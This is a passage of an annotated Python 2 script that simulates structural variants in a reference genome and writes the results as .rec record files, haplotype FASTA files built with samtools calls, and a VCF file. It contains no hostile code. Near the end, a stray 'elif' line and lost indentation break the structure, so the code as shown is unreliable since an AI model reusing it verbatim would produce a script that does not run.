    elif key=='INV':
        ka,kb='a/a','a^/a^'
    elif key=='TRA':
        ka,kb='ab/ab','ba/ba'
    elif key=='DUP':
        ka,kb='ab/ab','aba/aba'
    # an unknown key raises UnboundLocalError here, as in the original
    return [ka,kb]
def sv_homo_produce():
    """Append every region of the global SV_region list to sv_homo_info,
    keyed by its SV type (last field), together with the ref/alt structure
    strings from produce_keys.

    (Removed an unused 'sv_len = k1[2]-k1[1]' computation.)
    """
    for region in SV_region:
        sv_type=region[-1]
        sv_homo_info[sv_type].append(region+produce_keys(sv_type))
def sv_het_produce():
    """Derive heterozygous records from sv_homo_info: for each record one
    allele (chosen at random) keeps the alt structure while the other keeps
    ref.  Records are mutated in place and collected into the global
    sv_het_info.
    """
    for sv_type in sv_homo_info.keys():
        sv_het_info[sv_type]=[]
        for rec in sv_homo_info[sv_type]:
            which=random.choice(range(2))
            pool=[rec[-2].split('/')[0],rec[-1].split('/')[0]]
            rec[-1]=pool[which]+'/'+pool[1-which]
            sv_het_info[sv_type].append(rec)
def sv_rec_homo_produce():
    """Write one '<prefix>.homo.<TYPE>.rec' file per SV type, one
    space-separated record per line, echoing each filename to stdout."""
    for sv_type in sv_homo_info.keys():
        rec_name=dict_opts['--output-prefix']+'.homo.'+sv_type+'.rec'
        fo=open(rec_name,'w')
        print(rec_name)
        for rec in sv_homo_info[sv_type]:
            fo.write(' '.join([str(i) for i in rec])+'\n')
        fo.close()
def sv_rec_het_produce():
    """Write one '<prefix>.het.<TYPE>.rec' file per SV type, one
    space-separated record per line, echoing each filename to stdout."""
    for sv_type in sv_het_info.keys():
        rec_name=dict_opts['--output-prefix']+'.het.'+sv_type+'.rec'
        fo=open(rec_name,'w')
        print(rec_name)
        for rec in sv_het_info[sv_type]:
            fo.write(' '.join([str(i) for i in rec])+'\n')
        fo.close()
def sv_info_rewrite(sv_h_info):
    """Re-index records into the global sv_info as
    sv_info[ref_structure][alt_structure] = [[str fields..., 0.0], ...]
    (the trailing 0.0 is a placeholder score)."""
    for sv_type in sv_h_info.keys():
        for rec in sv_h_info[sv_type]:
            ref_key=rec[-2]
            alt_key=rec[-1]
            if not ref_key in sv_info.keys():
                sv_info[ref_key]={}
            if not alt_key in sv_info[ref_key].keys():
                sv_info[ref_key][alt_key]=[]
            sv_info[ref_key][alt_key].append([str(i) for i in rec[:-3]]+[0.0])
def sv_stat_calcu(sv_hash,key):
    """For every [count, min_size, max_size] entry under sv_hash[key] return
    [count, min, min+third, max-third, max], i.e. the size range cut into
    three equal bins (integer arithmetic)."""
    out=[]
    for entry in sv_hash[key]:
        lo=int(entry[1])
        hi=int(entry[2])
        third=(hi-lo)//3   # '//' == Python 2 int '/' here; stays int on py3
        out.append([entry[0],lo,lo+third,hi-third,hi])
    return out
def sv_size_pick(sv_stat):
    """Draw concrete SV sizes from binned statistics.

    Each sv_stat row is [count, b0, b1, b2, b3] (bin edges, see
    sv_stat_calcu): one third of the draws come uniformly from [b0,b1),
    half of the remainder from [b1,b2) and the rest from [b2,b3).

    (Removed a dead 'permute=random.sample(out,len(out))' whose result was
    never used -- the caller shuffles the pooled sizes itself.)
    """
    out=[]
    for row in sv_stat:
        total=int(row[0])
        n_low=total//3                 # first third of the draws
        n_mid=(total-n_low)//2         # half of the remainder
        n_high=total-n_low-n_mid       # everything left
        out+=[random.choice(range(int(row[1]),int(row[2]))) for _ in range(n_low)]
        out+=[random.choice(range(int(row[2]),int(row[3]))) for _ in range(n_mid)]
        out+=[random.choice(range(int(row[3]),int(row[4]))) for _ in range(n_high)]
    return out
def chromos_readin(refs):
    """Parse the samtools index '<refs>.fai' next to the reference.

    Distributes the global sv_total_num across chromosomes proportionally to
    their length and keeps only chromosomes assigned more than one region.
    Returns [genome_length, chromosomes, regions_per_chromosome,
    {chromosome: length}].

    (Removed an unused 'chrom_to_remove' list.)
    """
    fin=open(refs+'.fai')
    chromos=[]
    chromo_length=[]
    genome_length=0
    for line in fin:
        pin=line.strip().split()
        chromos.append(pin[0])
        genome_length+=int(pin[1])
        chromo_length.append(int(pin[1]))
    fin.close()
    chromo_num_region=[]
    for k1 in chromo_length:
        chromo_num_region.append(int(round(float(k1)/float(genome_length)*sv_total_num)))
    out_num_region=[]
    out_chromos=[]
    out_length={}
    for i in range(len(chromo_num_region)):
        if chromo_num_region[i]>1:
            out_chromos.append(chromos[i])
            out_num_region.append(chromo_num_region[i])
            out_length[chromos[i]]=chromo_length[i]
    return [genome_length]+[out_chromos]+[out_num_region]+[out_length]
def sv_hash_add(list_in,key):
    """Tag every size in list_in with `key` in the global sv_hash
    (size -> list of SV type tags)."""
    for size in list_in:
        if size in sv_hash.keys():
            sv_hash[size]+=[key]
        else:
            sv_hash[size]=[key]
def sv_region_pick():
    """Pick random, non-overlapping genomic regions for every simulated SV.

    Consumes the globals: chromos / chromo_num_region (regions per
    chromosome), chromo_length (lengths keyed by chromosome name), sv_hash
    (size -> list of SV type tags, consumed one tag per pick) and the pooled
    size lists del_size+dup_size+inv_size+tra_size+dup2_size.  Returns rows
    [chrom, start, end(, end2 for TRA), sv_type].
    """
    #pick random regions across the genome
    SV_region=[]
    rec=-1
    sv_size=del_size+dup_size+inv_size+tra_size+dup2_size
    sv_size=random.sample(sv_size,len(sv_size))
    for k1 in range(len(chromos)):
        chromosome=chromos[k1]
        num_region=chromo_num_region[k1]
        range_region=chromo_length[chromosome]
        # anchor points, keeping 1kb clear of the chromosome ends
        temp_start_region=sorted(random.sample(range(1000, range_region-1000),num_region+1))
        temp_end_region=[]
        for k2 in range(num_region):
            start=temp_start_region[k2]
            start2=temp_start_region[k2+1]
            if start2-start<1000: continue
            rec+=1
            temp_sv_size=sv_size[rec]
            sv_type=sv_hash[sv_size[rec]][0]
            # consume one type tag for this size
            del sv_hash[sv_size[rec]][0]
            end=start+temp_sv_size
            if not end<start2-300:
                # SV would run into the next anchor: shrink it
                end=random.choice(range(start,int(numpy.mean([start,start2]))))
            if sv_type=='TRA':
                # second breakpoint for translocations
                # NOTE(review): range(end+100,start2-100) can be empty when the
                # gap is tight, which would crash random.choice -- confirm.
                end2=random.choice(range(end+100,start2-100))
            temp_end_region.append(end)
            if sv_type=='TRA':
                SV_region.append([chromos[k1],start,end,end2,sv_type])
            else:
                SV_region.append([chromos[k1],start,end,sv_type])
    return SV_region
def ref_base_returnN(ref,chromo,pos):
    """Stub reference-base lookup: always returns 'N' regardless of the
    arguments (the real lookup would use `samtools faidx`, cf.
    ref_base_readin -- presumably stubbed to avoid per-record subprocess
    calls; confirm)."""
    return 'N'
def ref_base_readin(ref,chromo,pos):
    """Fetch the reference base at chromo:pos via `samtools faidx`; returns
    'N' when the query yields no sequence line."""
    handle=os.popen(r'''samtools faidx %s %s:%s-%s'''%(ref,chromo,str(pos),str(pos)))
    handle.readline()   # skip the FASTA header line
    base_fields=handle.readline().strip().split()
    return base_fields[0] if base_fields else 'N'
def del_flag_SA(k1,k2):
    """Return 1 if alt structure k2 is a pure deletion variant of ref
    structure k1: no inversion marks ('^'), no duplicated letters, letters
    still in strictly ascending order, and k2 differs from k1.
    Otherwise return 0."""
    if '^' in k2:
        return 0
    for ch in k2:
        if k2.count(ch)>1:
            return 0
    for left,right in zip(k2,k2[1:]):
        if ord(right)-ord(left)<1:
            return 0
    if k1==k2:
        return 0
    return 1
def order_SV_Homo_write(sv_info):
    """Index homozygous records by chromosome and start position into the
    global order_SV_Pos; each entry is [[chrom, int positions...],
    [alt allele string]]."""
    for ref_key in sv_info.keys():
        for alt_key in sv_info[ref_key].keys():
            for rec in sv_info[ref_key][alt_key]:
                chrom=rec[0]
                start=int(rec[1])
                if not chrom in order_SV_Pos.keys():
                    order_SV_Pos[chrom]={}
                if not start in order_SV_Pos[chrom].keys():
                    order_SV_Pos[chrom][start]=[]
                order_SV_Pos[chrom][start].append([[chrom]+[int(i) for i in rec[1:-1]],[alt_key.split('/')[0]]])
def order_SV_Het_write(sv_info):
    """Index heterozygous records by chromosome and start position into the
    global order_SV_Pos; each entry carries both alt alleles plus the ref
    allele: [[chrom, int positions...], [alt_a, alt_b, ref_a]]."""
    for ref_key in sv_info.keys():
        for alt_key in sv_info[ref_key].keys():
            for rec in sv_info[ref_key][alt_key]:
                chrom=rec[0]
                start=int(rec[1])
                if not chrom in order_SV_Pos.keys():
                    order_SV_Pos[chrom]={}
                if not start in order_SV_Pos[chrom].keys():
                    order_SV_Pos[chrom][start]=[]
                alt_a=alt_key.split('/')[0]
                alt_b=alt_key.split('/')[1]
                ref_a=ref_key.split('/')[0]
                order_SV_Pos[chrom][start].append([[chrom]+[int(i) for i in rec[1:-1]],[alt_a,alt_b,ref_a]])
def Ref_Alt_Produce(ChromoList,bp_list,letter_new,Ref_Seq_File):
    """Build the alternate-allele sequence for one SV region.

    bp_list: flat record of chromosome names and breakpoints (see example
    below); letter_new: the alt structure string ('' means the whole region
    is deleted and only a possible micro-insertion remains).  Each lettered
    block's sequence is fetched with `samtools faidx` from Ref_Seq_File;
    '<letter>^' uses the reverse complement.  A junction micro-insertion
    from insert_read_decide is appended at the end.
    """
    #Chromo=Chr, target chromosome
    #BamN: DG187, DG196... name of sample
    #eg of bp_list:[184569179, 184569775, 184571064, 184572009, 184572016]
    #Eg of flank: flank : 446
    if letter_new=='':
        return insert_read_decide(bp_list)
    else:
        # letter -> [chrom, left, right]; rec starts at 1 so chr(96+rec)=='a'
        bp_hash={}
        bp_seq=[]
        for k1 in bp_list:
            if k1 in ChromoList:
                bp_seq.append([k1])
            else:
                bp_seq[-1].append(k1)
        rec=0
        for k1 in bp_seq:
            for k2 in range(len(k1)-2):
                rec+=1
                bp_hash[chr(96+rec)]=[k1[0],k1[k2+1],k1[k2+2]]
        # fetch each block's sequence (and its reverse complement for '^')
        letter_seq={}
        for k1 in bp_hash.keys():
            Chromo=bp_hash[k1][0]
            region_left=bp_hash[k1][1]
            region_right=bp_hash[k1][2]
            seq=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File,Chromo,region_left,region_right))
            seq.readline().strip().split()
            lines=[]
            while True:
                line=seq.readline().strip().split()
                if not line: break
                lines.append(line)
            Seq1=lines[0][0]
            for j in range(len(lines))[1:]:
                Seq1=''.join([Seq1,lines[j][0]])
            letter_seq[k1]=Seq1
            letter_seq[k1+'^']=reverse(complementary(Seq1))
        # assemble the alt sequence token by token
        new_Seq=''
        new_letter=[]
        for k1 in letter_new:
            if not k1=='^':
                new_letter.append(k1)
            else:
                new_letter[-1]+=k1
        for k1 in new_letter:
            new_Seq+=letter_seq[k1]
        new_Seq+=insert_read_decide(bp_list)
        return new_Seq
def Ref_Ref_Produce(Chromo,bp_list,Ref_Seq_File):
    """Fetch the reference sequence Chromo:bp_list[0]-bp_list[-1]
    (inclusive, 1-based) via `samtools faidx` and return it as one string."""
    start=int(bp_list[0])
    end=int(bp_list[-1])
    handle=os.popen(r'''samtools faidx %s %s:%d-%d'''%(Ref_Seq_File, Chromo, start,end))
    handle.readline()  # skip the FASTA header line
    pieces=[]
    for line in handle:
        fields=line.strip().split()
        pieces.append(fields[0])
    handle.close()
    return ''.join(pieces)
def reverse(seq):
    """Return seq reversed (idiomatic slice instead of the manual
    append-then-join loop; identical output for both str and list input)."""
    return ''.join(seq[::-1])
def complementary(seq):
    """Return the base-complement of seq, preserving case; characters outside
    'ATGCNatgcn' are silently dropped (matching the original behaviour)."""
    pairs=dict(zip('ATGCNatgcn','TACGNtacgn'))
    return ''.join(pairs[base] for base in seq if base in pairs)
def unit_produce(list):
    """From a list of letters, build maximal consecutive runs and return
    every contiguous sub-unit of every run, longest units first.
    E.g. ['a','b','c'] -> ['abc','bc','ab','c','b','a'].

    NOTE(review): the parameter shadows the builtin `list`; kept for
    interface compatibility, aliased locally.
    """
    letters=sorted(list)
    runs=[letters[0]]
    for ch in letters[1:]:
        if ord(ch)-ord(runs[-1][-1])==1:
            runs[-1]+=ch
        else:
            runs.append(ch)
    units=[]
    for run in runs:
        for width in range(1,len(run)+1):
            for start in range(len(run)-width+1):
                units.append(run[start:start+width])
    return units[::-1]
def fasta_homo_write(fasta_out):
    """Write the homozygous simulated genome to fasta_out: for each
    chromosome (global chromos), stitch reference stretches
    (Ref_Ref_Produce) around the rearranged SV sequences (Ref_Alt_Produce)
    taken from the global order_SV_Pos, then wrap the sequence at 60
    columns."""
    fo=open(fasta_out,'w')
    print fasta_out
    for k1 in chromos:
        print >>fo, '>'+k1
        new1_ref=''
        rec1_start=0  # cursor; the +1 below converts to 1-based samtools coords
        for k2 in sorted(order_SV_Pos[k1].keys()):
            rec1_start+=1
            k3=order_SV_Pos[k1][k2]
            start=int(k3[0][0][1])
            end=int(k3[0][0][-1])
            new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
            new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
            rec1_start=end
        rec1_start+=1
        new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
        # wrap at 60 columns.
        # NOTE(review): this loop reuses k1, and when len(new1_ref)<60 the
        # range is empty so (k1+1) below still holds the chromosome name
        # string -- that would raise TypeError; confirm sequences are always
        # >= 60bp here.
        new1_seq=[]
        for k1 in range(len(new1_ref)/60):
            new1_seq.append(new1_ref[k1*60:(k1+1)*60])
        new1_seq.append(new1_ref[(k1+1)*60:])
        for k1 in new1_seq:
            if not k1=='':
                print >>fo, k1
    fo.close()
def fasta_het_write_a(fasta_out):
    """Write haplotype 1 of the heterozygous simulated genome to
    '<prefix>.het1.fa' (fasta_out with '.het.fa' replaced).

    Per chromosome: regions where the first alt allele differs from the ref
    allele (k3[0][1][0] != k3[0][1][2]) get the rearranged sequence from
    Ref_Alt_Produce, otherwise the plain reference stretch is kept; the
    result is wrapped at 60 columns.  The commented-out lines are the
    haplotype-2 counterpart, kept in fasta_het_write_b.
    """
    fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
    #fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
    fo1.close()
    #fo2.close()
    print fasta_out.replace('.het.fa','.het1.fa')
    #print fasta_out.replace('.het.fa','.het2.fa')
    for k1 in chromos:
        fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
        #fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
        print >>fo1, '>'+k1
        #print >>fo2, '>'+k1
        new1_ref=''
        rec1_start=0
        #new2_ref=''
        #rec2_start=0
        for k2 in sorted(order_SV_Pos[k1].keys()):
            print [k1,k2]
            rec1_start+=1
            k3=order_SV_Pos[k1][k2]
            start=int(k3[0][0][1])
            end=int(k3[0][0][-1])
            new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
            if not k3[0][1][0]==k3[0][1][2]:
                new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
            else:
                new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            rec1_start=end
            #rec2_start+=1
            #new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
            #if not k3[0][1][1]==k3[0][1][2]:
            #	new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
            #else:
            #	new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            #rec2_start=end
        rec1_start+=1
        #rec2_start+=1
        new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
        # wrap at 60 columns (same <60bp caveat as fasta_homo_write)
        new1_seq=[]
        for ka1 in range(len(new1_ref)/60):
            new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
        new1_seq.append(new1_ref[(ka1+1)*60:])
        for ka1 in new1_seq:
            if not ka1=='':
                print >>fo1, ka1
        #new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
        #new2_seq=[]
        #for ka1 in range(len(new2_ref)/60):
        #	new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
        #new2_seq.append(new2_ref[(ka1+1)*60:])
        #for ka1 in new2_seq:
        #	if not ka1=='':
        #		print >>fo2, ka1
        fo1.close()
        #fo2.close()
def fasta_het_write_b(fasta_out):
    """Write haplotype 2 of the heterozygous simulated genome to
    '<prefix>.het2.fa' (fasta_out with '.het.fa' replaced).

    Mirror of fasta_het_write_a using the second alt allele
    (k3[0][1][1]); the commented-out lines are the haplotype-1
    counterpart.
    """
    #fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'w')
    fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'w')
    #fo1.close()
    fo2.close()
    #print fasta_out.replace('.het.fa','.het1.fa')
    print fasta_out.replace('.het.fa','.het2.fa')
    for k1 in chromos:
        #fo1=open(fasta_out.replace('.het.fa','.het1.fa'),'a')
        fo2=open(fasta_out.replace('.het.fa','.het2.fa'),'a')
        #print >>fo1, '>'+k1
        print >>fo2, '>'+k1
        #new1_ref=''
        #rec1_start=0
        new2_ref=''
        rec2_start=0
        for k2 in sorted(order_SV_Pos[k1].keys()):
            print [k1,k2]
            k3=order_SV_Pos[k1][k2]
            start=int(k3[0][0][1])
            end=int(k3[0][0][-1])
            #rec1_start+=1
            #new1_ref+=Ref_Ref_Produce(k1,[rec1_start,start-1],ref)
            #if not k3[0][1][0]==k3[0][1][2]:
            #	new1_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][0],ref)
            #else:
            #	new1_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            #rec1_start=end
            rec2_start+=1
            new2_ref+=Ref_Ref_Produce(k1,[rec2_start,start-1],ref)
            if not k3[0][1][1]==k3[0][1][2]:
                new2_ref+=Ref_Alt_Produce(chromos,k3[0][0],k3[0][1][1],ref)
            else:
                new2_ref+=Ref_Ref_Produce(k1,[start,end],ref)
            rec2_start=end
        #rec1_start+=1
        rec2_start+=1
        #new1_ref+=Ref_Ref_Produce(k1,[rec1_start,chromo_length[k1]],ref)
        #new1_seq=[]
        #for ka1 in range(len(new1_ref)/60):
        #	new1_seq.append(new1_ref[ka1*60:(ka1+1)*60])
        #new1_seq.append(new1_ref[(ka1+1)*60:])
        #for ka1 in new1_seq:
        #	if not ka1=='':
        #		print >>fo1, ka1
        new2_ref+=Ref_Ref_Produce(k1,[rec2_start,chromo_length[k1]],ref)
        # wrap at 60 columns (same <60bp caveat as fasta_homo_write)
        new2_seq=[]
        for ka1 in range(len(new2_ref)/60):
            new2_seq.append(new2_ref[ka1*60:(ka1+1)*60])
        new2_seq.append(new2_ref[(ka1+1)*60:])
        for ka1 in new2_seq:
            if not ka1=='':
                print >>fo2, ka1
        #fo1.close()
        fo2.close()
def Sample_info_ReadIn(Sam_File):
    """Read the simulation parameter file into module-global ``sv_hash``.

    Each non-empty line is an SV type followed by integer columns
    (count, min_size, max_size, ...).  Rows are grouped by type; the
    count column (index 0) is inflated by 25% to compensate for regions
    discarded later by the placement filters.

    Fix: the two original branches duplicated the append/inflate logic
    verbatim; they differed only in lazily creating the key.
    """
    fi=open(Sam_File)
    for line in fi:
        pin=line.strip().split()
        if not pin==[]:
            if not pin[0] in sv_hash:
                sv_hash[pin[0]]=[]
            rec=[int(i) for i in pin[1:]]
            rec[0]=int(rec[0]*1.25)  # +25% oversampling of the event count
            sv_hash[pin[0]].append(rec)
    fi.close()
def sv_total_num_calcu():
    """Return the total simulated SV count: sum of column 0 over all five
    per-type stat tables (module globals del_stat, dup_stat, inv_stat,
    tra_stat, dup2_stat).

    Fix: the original repeated the same loop five times; collapsed into
    one loop over the tables.
    """
    sv_total_num=0
    for stat in (del_stat,dup_stat,inv_stat,tra_stat,dup2_stat):
        for k1 in stat:
            sv_total_num+=k1[0]
    return sv_total_num
def pick_random_seqs(ref,sv_total_num,chromo_length):
    #12% of all SVs have micro inserts at both / either ends
    #double number of seqs would be randomly picked from genome as long micro-insertions
    """Sample random 20-50bp reference sequences as a micro-insertion pool.

    Autosomes only ('GL' scaffolds and X/Y/MT excluded); the number of
    picks per chromosome is proportional to its share of the genome.
    Sequences are fetched with `samtools faidx`; reads containing an
    8-N run are discarded.  Returns {chrom: [seq, ...]}.
    """
    num_micro_ins_over20bp=float(sv_total_num)*0.12*2
    genome_length=0
    chromos_num_regions={}
    chrom_seqs={}
    for x in chromo_length.keys():
        if not 'GL' in x and not x in ['X','Y','MT']:
            genome_length+=chromo_length[x]
    for x in chromo_length.keys():
        if not 'GL' in x and not x in ['X','Y','MT']:
            chromos_num_regions[x]=float(chromo_length[x])/float(genome_length)*num_micro_ins_over20bp
    for x in chromos_num_regions.keys():
        chrom_seqs[x]=[]
        int_num=int(round(chromos_num_regions[x]))
        # keep a 10kb buffer away from the chromosome ends
        seq_pick=random.sample(range(10000,chromo_length[x]-10000),int_num)
        for y in sorted(seq_pick):
            length_pick=random.sample(range(20,50),1)[0]
            seqs=os.popen(r'''samtools faidx %s %s:%d-%d'''%(ref,x,y,y+length_pick))
            seqs.readline()
            test=seqs.readline().strip()
            if not 'NNNNNNNN' in test:
                chrom_seqs[x].append(test)
            seqs.close()
    return chrom_seqs
def produce_random_seqs(length):
    """Return a uniformly random nucleotide string of the given length."""
    bases='ATGC'  # same ordering as the original choice list
    return ''.join([random.choice(bases) for _ in range(length)])
# --- driver for the heterozygous-simulation branch ---
# CLI options: --reference, --input-sim, --input-rec, --output-prefix
opts,args=getopt.getopt(sys.argv[2:],'',['reference=','input-sim=','input-rec=','output-prefix='])
dict_opts=dict(opts)
Sam_File=dict_opts['--input-sim']
sv_hash={}
Sample_info_ReadIn(Sam_File)
# build per-type [count, min, q1, q2, max] size statistics
del_stat=sv_stat_calcu(sv_hash,'DEL')
dup_stat=sv_stat_calcu(sv_hash,'DUP_TANDEM')
dup2_stat=sv_stat_calcu(sv_hash,'DUP')
dup3_stat=[]
for i in dup2_stat:
    # dispersed duplications: pad all size bounds by 1kb
    dup3_stat.append([i[0]]+[j+1000 for j in i[1:]])
dup2_stat=dup3_stat
inv_stat=sv_stat_calcu(sv_hash,'INV')
tra_stat=sv_stat_calcu(sv_hash,'TRA')
sv_total_num=sv_total_num_calcu()
# draw one concrete size per simulated event
del_size=sv_size_pick(del_stat)
dup_size=sv_size_pick(dup_stat)
dup2_size=sv_size_pick(dup2_stat)
inv_size=sv_size_pick(inv_stat)
tra_size=sv_size_pick(tra_stat)
refs=dict_opts['--reference']
ref=refs
if not os.path.isfile(refs):
    print 'Wrong reference genome !'
if not os.path.isfile(refs+'.fai'):
    print 'reference genome not indexed !'
chromos_TOTAL=chromos_readin(refs)
genome_length=chromos_TOTAL[0]
chromos=chromos_TOTAL[1]
chromo_num_region=chromos_TOTAL[2]
chromo_length=chromos_TOTAL[3]
# re-key sv_hash: size -> list of SV types that requested that size
sv_hash={}
sv_hash_add(del_size,'DEL')
sv_hash_add(dup_size,'DUP_TANDEM')
sv_hash_add(dup2_size,'DUP')
sv_hash_add(inv_size,'INV')
sv_hash_add(tra_size,'TRA')
SV_region=sv_region_pick()
SV_region_filter=[]
for x in SV_region:
    # drop dispersed duplications shorter than 1.1kb
    if x[-1]=='DUP' and x[2]-x[1]<1100: continue
    else:
        SV_region_filter.append(x)
SV_region=SV_region_filter
sv_homo_info={}
sv_homo_initial()
sv_homo_produce()
sv_het_info={}
sv_het_produce()
for y in range(len(sv_het_info['DUP'])):
    # add an extra internal breakpoint z inside each dispersed duplication
    x=sv_het_info['DUP'][y]
    if x[2]-x[1]<2000:
        z=random.choice([x[1]+1000,x[2]-1000])
    else:
        # Python 2 only: '+' concatenates the two range() lists
        z=random.choice(range(x[1]+800,x[1]+1200)+range(x[2]-1200,x[2]-800))
    sv_het_info['DUP'][y]=x[:2]+[z]+x[2:]
sv_rec_het_produce()
sv_info={}
sv_info_rewrite(sv_het_info)
dup1={}
inv1={}
del1={}
tra1={}
sv_rec_2(sv_info)
sv_out={}
hash_reorder()
vcf_out=dict_opts['--output-prefix']+'.vcf'
write_VCF_header(vcf_out)
write_VCF_main(vcf_out)
fasta_out=dict_opts['--output-prefix']+'.het.fa'
#produce fasta file containing all sv file for homo svs
order_SV_Pos={}
order_SV_Het_write(sv_info)
seq_ins_pools=pick_random_seqs(ref,sv_total_num,chromo_length)
fasta_het_write_a(fasta_out)
fasta_het_write_b(fasta_out)
# index the two haplotype FASTAs
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.het.fa','.het1.fa')))
os.system(r'''samtools faidx %s'''%(fasta_out.replace('.het.fa','.het2.fa')))
elif function_name=='homozygous':
def sv_rec_2(sv_info):
    """Classify each (ref structure, alt structure) pair per allele and
    record the resulting simple SV calls via add_csv_info.

    flag 1 = first allele (k2aba), flag 2 = second allele (k2abb).

    Fixes: the empty-allele branch for allele b built its deletion list
    from k2abb (always '' there, so always empty) instead of the
    reference letters k1aba, inconsistent with the allele-a branch;
    also removed the unused 'test' local.
    """
    for k1ab in sorted(sv_info.keys()):
        for k2ab in sv_info[k1ab].keys():
            if not k2ab==k1ab:
                k1aba=k1ab.split('/')[0]
                k2aba=k2ab.split('/')[0]
                k2abb=k2ab.split('/')[1]
                flaga=[]
                flagb=[]
                if flaga==[] and not k1aba==k2aba:
                    if k2aba=='':
                        # empty alt allele: every reference letter is deleted
                        csv1=[[i for i in k1aba],[],[],0]
                    else:
                        csv1=simple_flag_SA(k1aba,k2aba)
                    add_csv_info(csv1,1,k1ab,k2ab)
                if flagb==[] and not k1aba==k2abb:
                    if k2abb=='':
                        # BUG FIX: was [i for i in k2abb] (always empty)
                        csv1=[[i for i in k1aba],[],[],0]
                    else:
                        csv1=simple_flag_SA(k1aba,k2abb)
                    add_csv_info(csv1,2,k1ab,k2ab)
score_Cff=-20  # quality cutoff: SVs scoring below this are written as LowQual
def hash_reorder():
    """Convert the per-type call tables (globals del1/inv1/dup1/tra1) into
    VCF-style rows stored in the global sv_out, keyed by chromosome then
    event ID.

    Genotype encoding: 'heta' -> 1|0, 'hetb' -> 0|1, 'homo' -> 1|1.
    Scores below score_Cff are flagged LowQual.  REF is left as the 'N'
    placeholder; write_VCF_main patches it via ref_base_returnN.

    Fix: the allele-b TRA branch assigned 'Genotype' (lower-case t), a
    typo that left GenoType stale so allele-b records inherited '1|0'.
    """
    for ka1 in del1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in del1[ka1]:
            REF_AL='N'
            Pass_Sign='PASS'
            if ka2[3]<score_Cff:
                Pass_Sign='LowQual'
            if ka2[2]=='heta':
                GenoType='1|0'
            elif ka2[2]=='hetb':
                GenoType='0|1'
            elif ka2[2]=='homo':
                GenoType='1|1'
            ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<DEL>',ka2[3],Pass_Sign,'SVTYPE=DEL;END='+str(ka2[1]),'GT',GenoType]
            if not ka2[-1] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-1]]=[]
            if not ka_new in sv_out[ka1][ka2[-1]]:
                sv_out[ka1][ka2[-1]].append(ka_new)
    for ka1 in inv1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in inv1[ka1]:
            REF_AL='N'
            Pass_Sign='PASS'
            if ka2[3]<score_Cff:
                Pass_Sign='LowQual'
            if ka2[2]=='heta':
                GenoType='1|0'
            elif ka2[2]=='hetb':
                GenoType='0|1'
            elif ka2[2]=='homo':
                GenoType='1|1'
            ka_new=[ka1,ka2[0],ka2[-1],REF_AL,'<INV>',ka2[3],Pass_Sign,'SVTYPE=INV;END='+str(ka2[1]),'GT',GenoType]
            if not ka2[-1] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-1]]=[]
            if not ka_new in sv_out[ka1][ka2[-1]]:
                sv_out[ka1][ka2[-1]].append(ka_new)
    for ka1 in dup1.keys():
        if not ka1 in sv_out.keys():
            sv_out[ka1]={}
        for ka2 in dup1[ka1]:
            REF_AL='N'
            CopyNumber=str(ka2[-1])
            Pass_Sign='PASS'
            if ka2[3]<score_Cff:
                Pass_Sign='LowQual'
            if ka2[2]=='heta':
                GenoType='1|0'
            elif ka2[2]=='hetb':
                GenoType='0|1'
            elif ka2[2]=='homo':
                GenoType='1|1'
            ka_new=[ka1,ka2[0],ka2[-2],REF_AL,'<DUP>',ka2[3],Pass_Sign,'SVTYPE=DUP;END='+str(ka2[1]),'GT:CN',GenoType+':'+CopyNumber]
            if not ka2[-2] in sv_out[ka1].keys():
                sv_out[ka1][ka2[-2]]=[]
            if not ka_new in sv_out[ka1][ka2[-2]]:
                sv_out[ka1][ka2[-2]].append(ka_new)
    for ka1 in tra1.keys():
        # tra1 keys encode 'chrom_..._score'
        ks1=ka1.split('_')[0]
        ks2='_'.join(ka1.split('_')[:-1])
        SV_Score=float(ka1.split('_')[-1])
        Pass_Sign='PASS'
        if SV_Score<score_Cff:
            Pass_Sign='LowQual'
        if not ks1 in sv_out.keys():
            sv_out[ks1]={}
        if not ks2 in sv_out[ks1].keys():
            sv_out[ks1][ks2]=[]
        for ka2 in tra1[ka1].keys():
            hetx='het'+ka2
            if ka2=='a':
                GenoType='1|0'
            elif ka2=='b':
                # BUG FIX: was Genotype='0|1' (typo) leaving GenoType stale
                GenoType='0|1'
            for ka3 in tra1[ka1][ka2]:
                ka_new=ka3[:2]+[ks2,ka3[2]]+ka3[3:]+[SV_Score,Pass_Sign,'SVTYPE=TRA','GT',GenoType]
                if not ka_new in sv_out[ks1][ks2]:
                    sv_out[ks1][ks2].append(ka_new)
def write_VCF_header(output_file):
    """Write a VCFv4.1 meta-information header plus the #CHROM column line.

    The sample column name is derived from the output filename (basename
    without '.vcf').  Python 2 print-to-file syntax.
    """
    fo=open(output_file,'w')
    print output_file
    print>>fo, '##fileformat=VCFv4.1'
    print>>fo,'##fileDate='+time.strftime("%Y%m%d")
    print>>fo,'##reference=hg19'
